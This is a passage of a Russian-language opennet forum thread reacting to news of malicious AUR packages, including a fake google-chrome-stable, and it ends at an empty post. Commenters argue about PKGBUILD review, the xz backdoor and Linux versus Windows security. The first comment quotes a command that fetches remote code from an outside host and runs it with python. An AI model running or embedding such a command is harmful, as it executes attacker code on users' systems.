Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Изначальное сообщение		[ Отслеживать ]

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных пакета"	+/–
Сообщение от opennews (??), 01-Авг-25, 22:35
В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам  firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе... Подробнее: https://www.opennet.dev/opennews/art.shtml?num=63662
Ответить | Правка | Cообщить модератору

Сообщения

[Сортировка по ответам | RSS]

1. Сообщение от Аноним (1), 01-Авг-25, 22:35	+5 +/–
> python -c "$(curl https://segs.lol/9wUb1Z)" LOL!
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #231

2. Сообщение от Аноним (2), 01-Авг-25, 22:36	+25 +/–
В AUR-репозитории выявлен безвредный пакет.
Ответить | Правка | Наверх | Cообщить модератору

3. Сообщение от Аноним (3), 01-Авг-25, 22:49	+/–
Вредоносных программ под Linux всё больше и больше. Но правда они чаще всего атакуют пользователей работают из-под рута.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #5, #48

4. Сообщение от Аноним (5), 01-Авг-25, 22:49	+/–
Так можно туннели бекдором до SSH кидать и компом чужим управлять..
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #75

5. Сообщение от Аноним (5), 01-Авг-25, 22:52	+1 +/–
виноват в первую очередь сам пользователь Главное написать Не ставить ЭТОТ пакет.. и пользователь поставит. Ведь всю помойку тянут на ПК.. всю!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3

6. Сообщение от Аноним (6), 01-Авг-25, 22:58	–1 +/–
И что теперь делать?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #7, #16, #26, #28, #185

7. Сообщение от Аноним (7), 01-Авг-25, 23:10	+17 +/–
Читать пкгбилды аура перед запуском. Правда в мире, где половина инновационного софта ставится через curl |sudo sh , будет затруднительно отличить вирус от нормального софта.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6 Ответы: #49

10. Сообщение от freeperson (?), 01-Авг-25, 23:30	–7 +/–
Arch стал уже стал попсой, как винда, что его таргетят кулхацкеры ежедневно. AUR это та ещё помойка, где никто не проверяет ничего. Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #14, #24, #33, #141, #153, #201

14. Сообщение от Аноним (14), 02-Авг-25, 00:04	+/–
Гентушникам тоже ухо держать востро в отношении к оверлеям.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10 Ответы: #32

16. Сообщение от НяшМяш (ok), 02-Авг-25, 00:12	–1 +/–
Клонить репы себе на машину, удалять .git, проверять PKGBUILD и самому поддерживать. Иногда даже получается проще, потому что меинтейнеры оригинальных пакетов часто слоупочат версии обновлять.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6 Ответы: #150

20. Сообщение от Аноним (20), 02-Авг-25, 01:02	+2 +/–
AUR удобно использовать как источник готовых инструкций для сборки пакетов которых нет в BLFS.
Ответить | Правка | Наверх | Cообщить модератору

24. Сообщение от Аноним (26), 02-Авг-25, 02:16	+1 +/–
> AUR это та ещё помойка, где никто не проверяет ничего. > Вредоносный пакет был удалён администраторами AUR через несколько часов после появления. Держи в курсе. > ставьте Слаку или Gentoo, и будет вам счастье. Не ставьте свое "ненужно", ставьте мое "ненужно"!!!1!1
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

26. Сообщение от Аноним (26), 02-Авг-25, 02:33	+1 +/–
В дополнение к вышеупомянутому ОБЯЗАТЕЛЬНОМУ чтению PKGBUILD'ов. Наверное не ставить пакеты с идиотскими названиями, от васяна с нулевым аккаунтом. А также заглядывать в комментарии AUR странички, главное, чтобы они тоже не были идиотскими, от васяна с нулевым аккаунтом.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6 Ответы: #151

28. Сообщение от Bottle (?), 02-Авг-25, 02:50	+/–
Читать исходники? Поборники свободы сами что-то не желают ей пользоваться на постоянке - они хотят, чтобы за них работали БЕСПЛАТНО.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6 Ответы: #50, #91

32. Сообщение от 12yoexpert (ok), 02-Авг-25, 05:29	+1 +/–
разумеется, но: 1) гентушников тупо меньше и оверлеи им нужны гораздо реже, чем AUR на арче, и для настолько специфичного софта, что пропихивать туда малварь тупо не окупится 2) это гента со всеми вытекающими, поди заставь свою попсовую малварь там работать: у кого-то musl, у кого-то openrc, у кого-то, прости господи, шланг, даже версии питона у всех разные
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14 Ответы: #58

33. Сообщение от 12yoexpert (ok), 02-Авг-25, 05:33	+/–
поддерживаю как гентушник, лет 7 сидевший на арче
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

38. Сообщение от Аноним (203), 02-Авг-25, 06:07	+2 +/–
Чем это отличается от npm?
Ответить | Правка | Наверх | Cообщить модератору

41. Сообщение от Анониматор (?), 02-Авг-25, 07:10	+2 +/–
Это всё Манждаро виноват. Понаставят pamac-aur и всё, считают что AUR это часть Арча, прозрачная установка "из магазина". Хотя уже много где в сети написано что они дурачье и не надо делать так. Но если кому-то нравится рисковать - это конечно ваше дело, но не надо свои проблемы триангулировать на всех
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #46

42. Сообщение от ЖИРОПЕРДЯСТИК (?), 02-Авг-25, 07:10	–1 +/–
Да изначально было понятно, что AUR - это помойка. Любой Васян туда может прийти и понапихать бэкдоров в пакеты.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #52, #94

45. Сообщение от Аноним (45), 02-Авг-25, 07:44	+1 +/–
А что ваш там pip или npm прям безопасны да? Или PPA Ubuntu? Берешь себе за правило - изучать каждый PKGBUILD и всё, проблема решена! Собственно, по мимо администраторов, юзеры тоже могут проверять PGBUILDы и указывать на нарушения. Ну и не хрен ставить все подряд, не думая и не проверяя, такой подход угробит любую ОСь, хоть даже винду, мак или андроид.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #53

46. Сообщение от ЖИРОПЕРДЯСТИК (?), 02-Авг-25, 07:55	–6 +/–
> считают что AUR это часть Арча Так убери у Арча AUR и он превратится в маргинальный дистрибутив, которым пользуются три калеки. А если AUR использовать, то это ЗверьCD скачай бесплатно без SMS.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41 Ответы: #47, #154

47. Сообщение от Аноним (47), 02-Авг-25, 08:05	+1 +/–
ты назвал маргинальщиной такие дистрибутивы как RHEL с клонами и многими другими. Они тоже без епеля (ppa и т.д.) ничто. AUR скорее всего уйдет в тень, потому что тенденция всё недостающее ставить из флатхаба, а это по наполнению тоже как говорится "найди 3 отличия от AUR", так что Арч и тут не выделяется среди других "маргинальностью"
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #46

48. Сообщение от Anonimm (?), 02-Авг-25, 08:08	+2 +/–
Гениально! В винде вирусы и трояны устанавливаются из-под админа - "дырявая система", то же самое в лине - "но правда для запуска требуется рут"..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #88, #106

49. Сообщение от Anonimm (?), 02-Авг-25, 08:11	–3 +/–
> Читать пкгбилды Нормальные системы ставятся через "Далее" и только в лине для установки программ нужно быть ещё и программистом..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7 Ответы: #64, #78, #89, #90, #199

50. Сообщение от Anonimm (?), 02-Авг-25, 08:12	+/–
Интересно, а для андроида и айфона они тоже исходники читают? Вспомнил - ведь "это другое".. 😆
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #28 Ответы: #59

52. Сообщение от Аноним (47), 02-Авг-25, 08:16	+2 +/–
Таких васянов там сразу отлавливают, этот и полдня не продержался. Отличная работа
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42 Ответы: #77

53. Сообщение от Anonimm (?), 02-Авг-25, 08:18	–2 +/–
> изучать каждый PKGBUILD А потом удивляться, что вас всего 4%..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #45 Ответы: #81, #121

58. Сообщение от dannyD (?), 02-Авг-25, 08:53	+/–
>>гентушников тупо меньше это с какого пальца? может чем бубунтят и меньше,но с рачеводами я бы еще сильно поспорил.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #32 Ответы: #72

59. Сообщение от dannyD (?), 02-Авг-25, 08:58	–1 +/–
сходи на f-droid почитай.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #50 Ответы: #177

63. Сообщение от Аноним (63), 02-Авг-25, 09:13	+/–
А ведь в убунтовском launchpad ppa не меньше, или даже больше малвари от ноунэйм авторов. А в aur то не бинари, а pkgbuild, что как бы позволяет увидеть подмену.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #87

64. Сообщение от Аноним (64), 02-Авг-25, 09:25	+2 +/–
Для быта Линукс даже не мёртв, а не зачат.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49

67. Сообщение от Аноним (67), 02-Авг-25, 09:37	–2 +/–
Достаточно не ставить свежие пакеты из аур.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #73, #159, #166

72. Сообщение от 12yoexpert (ok), 02-Авг-25, 10:25	+/–
да тупо судя по количеству попсовых пакетов. поди попробуй собери хоть один слайсер на генту, хоть оверлеями, хоть без мне пришлось вырезать половину месы, чтобы кура запустилась
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #58 Ответы: #85, #140

73. Сообщение от 12yoexpert (ok), 02-Авг-25, 10:26	–1 +/–
это арч, там в принципе нет несвежих пакетов
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

75. Сообщение от Аноним (75), 02-Авг-25, 10:31	–5 +/–
На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4 Ответы: #101

77. Сообщение от Аноним (77), 02-Авг-25, 10:38	+/–
Не совсем. Поскольку у них нет премодерации пакетов от не пойми кого.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52

78. Сообщение от Аноним (75), 02-Авг-25, 10:40	+/–
Разработанные мной программы под Linux ставятся, как Вы выразились, через "Далее" с помощью InstallJammer.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49 Ответы: #147

81. Сообщение от Аноним (75), 02-Авг-25, 10:51	+/–
> вас всего 4% Нас даже официально 5%. Не считая суверенных установок, которые используются во всем мире, а не только в РФ, "как думают некоторые студенты", и вряд ли попадают в данную статистику.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53 Ответы: #156

85. Сообщение от dannyD (?), 02-Авг-25, 11:54	+/–
>>да тупо судя по количеству попсовых пакетов. ошибка статистической выборки. ну не надо гентушникам это, я вот даже не знаю о чем вы, коллега.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #72 Ответы: #170

86. Сообщение от Аноним (86), 02-Авг-25, 11:57	–1 +/–
Это проблема куда шире чем кажется. Разработчик вылежат своё ПО только под Win и Mac, он не будит собирать под 100500 диструбтивов Linux на 4% рынка дисктопов! А пользователь хочет именно пользоваться ОС, то есть устанавливать ПО в пару кликов через GUI. Вот здесь у тех, у кого красные глаза и бубен в руках решают монетанизировать свой мазахизм чёрными методами!
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #95, #220

87. Сообщение от Аноним (87), 02-Авг-25, 11:58	+1 +/–
> А в aur то не бинари Говоришь так, будто бы их там нет...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63 Ответы: #119

88. Сообщение от Аноним (88), 02-Авг-25, 12:04	+2 +/–
Надо ставить DrWeb
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #48 Ответы: #100

89. Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:04	+/–
Так Арч не для домохозяек, а для опытных Линукс пользователей, с разморозкой.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49 Ответы: #102, #148

90. Сообщение от Аноним (88), 02-Авг-25, 12:06	+1 +/–
Установить антивирус. Во всех нормальных магазинах приложений для Андроид есть встроенный.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49 Ответы: #103

91. Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:06	+/–
Потому-то здесь троллей и навалом, ибо не понимают разницы между виндой и дистрибутивами Линукс.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #28 Ответы: #104

93. Сообщение от Аноним (93), 02-Авг-25, 12:13	+/–
От AUR отказала два года назад, когда скачал бинарник и решил проверить на вирустотал - бэкдор.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #96

94. Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:14	+2 +/–
Not a bug, а фича. Нормальный aur helper перед установкой любого пакета оттуда сначала показывает pkgbuild файл, а дальше всё зависит от прослойки между монитором и креслом.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42 Ответы: #135, #189

95. Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:17	+1 +/–
Просто ввёл название пакета в терминал и установил его, даже не кликая мышью. чяднт? Или искать в интернетах удобнее?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #86 Ответы: #142, #165

96. Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:23	–1 +/–
Aур использую чтоб качать 1 пакет, zapret.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #93

100. Сообщение от Anonimm (?), 02-Авг-25, 12:50	–1 +/–
Я о двойных стандартах. То, что винду считают дырявой, но если линь делает ровно то же, то это норма..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #88 Ответы: #130

101. Сообщение от Anonimm (?), 02-Авг-25, 12:52	+2 +/–
А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет? Да уж, уровень экспертности зашкаливает.. 😆
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #75 Ответы: #107, #116, #206

102. Сообщение от Anonimm (?), 02-Авг-25, 12:53	–1 +/–
А вот и разделение на сорта подъехало..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #89 Ответы: #114

103. Сообщение от Anonimm (?), 02-Авг-25, 12:54	+/–
Какая взаимосвязь между pkgbuild и Android?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #90 Ответы: #149, #168

104. Сообщение от Anonimm (?), 02-Авг-25, 12:56	+1 +/–
> не понимают разницы между виндой и дистрибутивами Линукс. Как выяснилось - никакой..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #91 Ответы: #152

106. Сообщение от Аноним (106), 02-Авг-25, 12:59	+/–
Это - другое! ))
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #48

107. Сообщение от olelukoie (ok), 02-Авг-25, 13:20	+/–
М-да? А если еще раз подумать? В нормальных дистрибутивах (open)ssh-client(s) и (open)ssh-server - это разные пакеты и если надо подключаться к удаленному хосту по ssh, а свой сервер поднимать не требуется, то ставится только пакет 'client'. > На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером. Если есть статический IP, то ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит). Так что наличие ssh на домашнем компе не такая уж ненужная вещь. А про рабочий комп в "офисе", если он переведен на "отечественную" ОС или любой другой Linux, то ssh - один из очень немногих способов админам управлять рабочими местами сотрудников, так что ssh-сервер тоже весьма вероятно будет нужен.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #101 Ответы: #118

114. Сообщение от Пояснительная бригада (?), 02-Авг-25, 14:41	+1 +/–
Так зайди на офф сайт арча и почитай об этом! Писать все горазды.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #102

116. Сообщение от Аноним (75), 02-Авг-25, 14:48	+/–
> А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет? Не могу представить себе бухгалтера, который в минутку для отдыха от работы в 1С решил зайти по SSH на сервер. В нормальном учреждении пользователи работают с определенным набором приложений. Всё. Об админах не говорим - там другое дело. Да, и админу нечего делать на компьютере пользователя через SSH.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #101 Ответы: #174, #211

118. Сообщение от Аноним (75), 02-Авг-25, 14:49	+/–
> ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит) Против такого трудно что-то возразить. Ставьте, заходите. Только я бы при острой нужде подключился по RDP.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #107 Ответы: #210

119. Сообщение от Аноним (26), 02-Авг-25, 14:52	+/–
Для тугодумов разжую. PKGBUILD это простой bash скрипт, даже если пакет собирается из бинарников, в этом скрипте находятся ссылки на источники с которых эти бинарники качаются. Никто не мешает заглянуть в PKGBUILD (хоть через вебморду) и убедится что файлы качаются с официального сайта/репозитория.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #87 Ответы: #158

121. Сообщение от Пояснительная бригада (?), 02-Авг-25, 15:01	+/–
Тебе надо 146%?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53

130. Сообщение от Аноним (-), 02-Авг-25, 16:18	+/–
Ты передёргиваешь. Линукс безопасен. Описанное в новости поведение вредителя на Windows OS делается вполне легально. Винда вполне легально делает скриншот твоего рабочего стола и отправляет его на свои сервера. И никто по этому поводу не возникает, потому что вредительство прописано в лицензионном договоре.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #100 Ответы: #145, #173, #188

135. Сообщение от Аноним (203), 02-Авг-25, 18:35	+1 +/–
Посмотри как в xz бэкдор всунули и подумай, поможет ли тебе чтение pkgbuild файлов.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #94 Ответы: #179

140. Сообщение от Аноним (140), 02-Авг-25, 19:52	+/–
куры нет в репе 24.04 LTS - я немного охренел от такого (в дебиане то все есть), пришлось собрать из более младшенького - работает... но вот от того куда скатился "самый человечный десктоп дистр" я немного удивился...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #72 Ответы: #190

141. Сообщение от Аноним (141), 02-Авг-25, 19:52	+/–
> Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье. Я выбирал между Слакой и Арчем. От Слаки отказался только из-за отсутствия отслеживания зависимостей пакетов. Думал про Генту или ЛФС, но там читать слишком много, я хоть и безработный на сегодняшний день, но времени на это не хватает.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10 Ответы: #208

142. Сообщение от Аноним (140), 02-Авг-25, 19:55	+1 +/–
виндузятнику же удобнее "бесплатно и без смс" - он по другому и не умеет...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #95 Ответы: #182

145. Сообщение от кантикариус (?), 02-Авг-25, 20:26	–4 +/–
Не делает, если ты не захочешь. А если делает, то никуда не отправляет. У вас просто очень большие глаза. Это из-за плохих дешёвых экранов и трудночитаемых шрифтов.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #130

147. Сообщение от кантикариус (?), 02-Авг-25, 20:30	+/–
Что за программы? Хочу поставить. Хотелось бы получить полный список со ссылками.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #78

148. Сообщение от кантикариус (?), 02-Авг-25, 20:37	+/–
Я домохозяин. Несколько лет на Арче сидел. Ничем принципиально не отличается от Убунты, кроме того, что всё-таки нужно почитать мануалы и больше печатать в терминале. Да и то, это больше касается процесса установки, чем последующего повседневного использования. А так, что тот линукс, что этот на десктопе как на корове седло.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #89

149. Сообщение от кантикариус (?), 02-Авг-25, 20:39	+/–
Прямая. Андроид - это линукс? Или нет?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #103 Ответы: #175

150. Сообщение от кантикариус (?), 02-Авг-25, 20:44	–1 +/–
Здесь есть чел у которого 493 правила для браузера в Никс Ось. Да ну обычный линукс-десктоп обычного линукс-пользователя. >на машину Как же мне нравится, когда вы называете свои коре 2 дуо и пентиумы МАШИНАМИ! :DD Респект!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16 Ответы: #200

151. Сообщение от кантикариус (?), 02-Авг-25, 20:48	–1 +/–
Сейчас ставить из AUR - это примерно как я зайду на дзен или на маил.сру и начну оттуда по ссылкам ставить софт на винду :D
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #26 Ответы: #184

152. Сообщение от кантикариус (?), 02-Авг-25, 20:51	+/–
Ну нифига себе поклёп. На винде можно отдыхать и работать. А под жигулями только лежать.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #104 Ответы: #178

153. Сообщение от кантикариус (?), 02-Авг-25, 20:53	+/–
Нужно сразу ставить LFS.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

154. Сообщение от кантикариус (?), 02-Авг-25, 20:58	+/–
> Так убери у Арча AUR и он превратится в маргинальный дистрибутив Ерню полную сморозил. Гейб смотрит на тебя с жалостью.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #46

156. Сообщение от кантикариус (?), 02-Авг-25, 21:02	+/–
Где вас 5%? Всё изворачиваетесь. Идите ещё снова Андроид посчитайте. Как было ~1,5%, так и есть.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #81 Ответы: #180

158. Сообщение от кантикариус (?), 02-Авг-25, 21:05	+/–
убедится что файлы качаются с официального скомпрометированного гитхаба.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #119

159. Сообщение от кантикариус (?), 02-Авг-25, 21:07	+1 +/–
И начать ставить несвежие. Из AUR :D
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

165. Сообщение от Аноним (86), 02-Авг-25, 21:52	+/–
Вы это написали к чему? Намекаете что и так всё в порядке? Про процент дисктопа уже было написано. > "Просто ввёл название пакета в терминал и установил его, даже не кликая мышью. чяднт?" У людей ОС установлена не для развлечений, у них вообще-то платёжный терминал для торговли на бирже установлен. А вы предлагаете довериться какому-то непонятному Васи. Сторонники теории 1000 глаз? Только она не даёт гарантии. Сколько было случаев, когда пакет выкупали и внедряли блэкдор. > "Или искать в интернетах удобнее?" Безопаснее ставить ПО напрямую от создателя. Под "в пару кликов через GUI." имеется виду, что для этого консоль открывать не нужно. Снизу коммент, тоже относится и к ppa. Это вам не AppStore, где есть пре-модерация. > "От AUR отказала два года назад, когда скачал бинарник и решил проверить на вирустотал - бэкдор." Казалось бы, причём здесь LTS, только там софт (вмести с багами, которые знают абсолютно все) устаревший - старше чем помёт мамонта. Valve из-за этого фактора на Arch перешла.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #95

166. Сообщение от Аноним (166), 02-Авг-25, 22:52	+/–
Лол, что, это реальная защита такая? Линус фанаты продолжают нести и не расплескивать. Никто ни за что не отвечает, тысячи пакетов, непонятные мейнтейнеры, про которых известен только их выдуманный email, никакой репутации или юридической ответственности - БЕЗОПАСНОСТЬ. Про xz, который был затроянен месяцами и попал в несколько листов, забыли. ЛОЛ.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67 Ответы: #186

168. Сообщение от Аноним (88), 02-Авг-25, 23:13	+/–
Прямая, магазин приложений обращается в репозиторий приложений (пакетов в любом формате), в котором осуществляется эвристический анализ.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #103 Ответы: #176

170. Сообщение от 12yoexpert (ok), 03-Авг-25, 00:36	+/–
это софт для нарезки 3д-моделей в g-code команды для 3д-принтера
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #85 Ответы: #202

173. Сообщение от Anonimm (?), 03-Авг-25, 06:58	–1 +/–
Поменьше смотрите телевизор и особенно Рен-ТВ..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #130 Ответы: #183

174. Сообщение от Anonimm (?), 03-Авг-25, 07:00	+/–
Уже бухгалтер? А сначала был домашний компьютер..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #116

175. Сообщение от Anonimm (?), 03-Авг-25, 07:03	+/–
Ну когда линукс сообществу нужно показать свою особенность, то к линю начинают приплетать все подряд - серверы, роутеры, смартфоны. Но если находят уязвимость в вышеперечисленном, то сразу начинают говорить, что линь сам по себе..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #149 Ответы: #213

176. Сообщение от Anonimm (?), 03-Авг-25, 07:05	+/–
Эвристический анализ для установки программы?😆 Да уж, снова убеждаюсь, что местным "экспертам" на "Почте России" нужно работать - впаривать пенсам макароны и консервы..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #168

177. Сообщение от Anonimm (?), 03-Авг-25, 07:07	+/–
На фдроиде в принципе не выкладывают исходники. Максимум - ссылка на проект автора.. Ваша шутка не удалась, сударь..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #59 Ответы: #216

178. Сообщение от Anonimm (?), 03-Авг-25, 07:09	+1 +/–
Имелась ввиду безопасность, которой в любой системе должен заниматься пользователь. Но 4%-ное сообщество убеждает нас, что уж их-то система безопасней той же винды. Данная новость показывает всем, что это далеко не так..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #152 Ответы: #217

179. Сообщение от Anonimm (?), 03-Авг-25, 07:11	+1 +/–
"это другое", вы что.. 😆
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #135

180. Сообщение от Anonimm (?), 03-Авг-25, 07:14	+/–
Если линукс сообществу нужно заявить о себе, то приплетают все - серверы, роутеры, смартфоны, умные телевизоры с холодильниками и утюгами.. Но если в этом всем находят уязвимость, то линукс "вдруг" становится самим по себе, без фенов и пылесосов..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #156 Ответы: #197, #219

182. Сообщение от Anonimm (?), 03-Авг-25, 07:17	+1 +/–
Гениально! Проблема в очередной раз в лине, но 4%-ное сообщество при любом удобном случае поливает грязью другую систему..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #142 Ответы: #204

183. Сообщение от товарищ майор (?), 03-Авг-25, 07:57	+/–
ты у меня - допереключаешься!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #173

184. Сообщение от пох. (?), 03-Авг-25, 08:06	–1 +/–
Ты не поверишь, но большинство обычного софта на винду именно так и ставится. По ссылкам. Если не с мэйлру то с хабра. Откуда-то надо тебе узнать о существовании этого софта. И ничего ужасного, как правило, не произойдет, а об остальном одном проценте позаботится антивирус. И да, в том числе из-за подписей. А у вас - с одной стороны централизованный вреднозиторий, а с другой - полное отсутствие хотя бы видимости контроля за его содержимым.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #151 Ответы: #214

185. Сообщение от Аноним (185), 03-Авг-25, 08:31	–1 +/–
Если вы пострадавший, то писать заявление в полицию. Если нужно, они подключат Интерпол.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6

186. Сообщение от Аноним (185), 03-Авг-25, 08:32	+1 +/–
Опеннет-истерички продолжают нагнетать.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #166 Ответы: #187

187. Сообщение от Anonimm (?), 03-Авг-25, 08:43	–1 +/–
Нагнетать? В "безопасной" системе довольно долгое время жил бэкдор, который "тысячи глаз" заметили далеко не сразу. И ещё у вас, представителей 4%-сообщества есть привычка съезжать с темы при любом негативном упоминании, что ваша "безопасная" система является именно такой, безопасной в кавычках..
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #186 Ответы: #191

188. Сообщение от Anonimm (?), 03-Авг-25, 08:51	–1 +/–
Один вопрос. Какая взаимосвязь между трояном в репозитории (пусть и стороннем) для линукса и виндой? Я понимаю, что 4%-ное сообщество не хочет признавать факт, что безопасности в линукс ровно столько же, как и в любой другой системе, но причём здесь винда? Кстати, Android тоже вроде на лине построен (или уже нет и его упоминание невыгодно?) и тоже как винда устанавливает софт по одному нажатию, но "это другое", верно?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #130 Ответы: #192

189. Сообщение от Anonimm (?), 03-Авг-25, 08:57	–1 +/–
> нормальный Ты где "Этодругин" покупаешь? Сначала вы делите пользователей на сорта, потом начинаете ранжировать приложения по степени нормальности. А дальше что? Невозможность пользоваться линуксом вы будете "объяснять" монитором не того цвета у пользователя?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #94

190. Сообщение от 12yoexpert (ok), 03-Авг-25, 09:46	+/–
у них же идеология "жрите снап-пакеты и не выпендривайтесь"
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #140

191. Сообщение от Аноним (141), 03-Авг-25, 09:47	+/–
А кто пострадал от этого бэкдора? Сейчас у меня арч и я даже не знаю как поймать вирус. Из аура ставлю пару пакетов, у которых нормальный рейтинг от сообщества, в PKGBUILD не заглядывал. Даже подключил репо chaotic-aur, ставил игрушки оттуда. А когда пользовался виндой, много раз ловил вирусов-вымогателей, которые мне всё шифровали, благо у меня всегда были копии всех данных. Несколько раз помогал знакомым в подобных случаях. Хотя от винды отказался не по этой причине.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #187 Ответы: #195

192. Сообщение от Аноним (-), 03-Авг-25, 10:16	+1 +/–
